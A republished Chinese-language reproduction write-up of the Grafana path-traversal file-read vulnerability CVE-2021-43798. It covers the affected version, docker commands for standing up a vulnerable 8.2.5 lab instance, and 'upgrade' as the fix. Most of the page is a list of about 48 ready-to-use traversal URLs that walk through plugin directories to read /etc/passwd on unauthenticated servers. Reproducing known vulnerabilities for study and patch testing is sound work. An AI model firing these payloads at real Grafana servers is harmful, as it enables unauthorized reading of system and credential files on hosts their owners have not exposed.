碼上快樂

相關內容    簡體    繁體

Grafana 任意文件讀取漏洞(CVE-2021-43798)

本文轉載自   查看原文   2022-03-27 14:21   1892    grafana/ CVE-2021-43798

Preface

  Grafana是一個跨平台、開源的數據可視化網絡應用程序平台。用戶配置連接的數據源之后,Grafana可以在網絡瀏覽器里顯示數據圖表和警告。Grafana 存在未授權任意文件讀取漏洞,攻擊者在未經身份驗證的情況下可通過該漏洞讀取主機上的任意文件。

CVE編號:
    CVE-2021-43798
影響范圍:
    Grafana v8.2.6
Links
    https://nvd.nist.gov/vuln/detail/CVE-2021-43798
    https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/

復現記錄

grafana 環境部署 
docker pull grafana/grafana:8.2.5
docker run -d -p 3000:3000 --name=grafana grafana/grafana:8.2.5

PoCs

因為不知道Grafana安裝了什么插件需要模糊測試:

/public/plugins/alertGroups/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd

修復方案

版本升級。

Refer 

https://www.cnblogs.com/twlr/p/15664043.html


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 (CVE-2021-21972) VM vCenter任意文件上傳漏洞復現 Rand函數引發的安全問題 —— OSSN任意文件讀取漏洞(CVE-2020-10560) 【CVE-2020-1938】Tomcat AJP 任意文件讀取和包含漏洞分析記錄 FFmpeg任意文件讀取漏洞分析 Openfire Admin Console SSRF&任意文件讀取漏洞 CVE-2019-18394 CVE-2019-18393 poc WebLogic任意文件上傳漏洞(CVE-2019-2725) Tomcat 任意文件上傳漏洞(CVE-2017-12615) ActiveMQ任意文件寫入漏洞(CVE-2016-3088) apache flink任意文件讀取&文件上傳漏洞復現 Apache Solr任意文件讀取漏洞復現
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM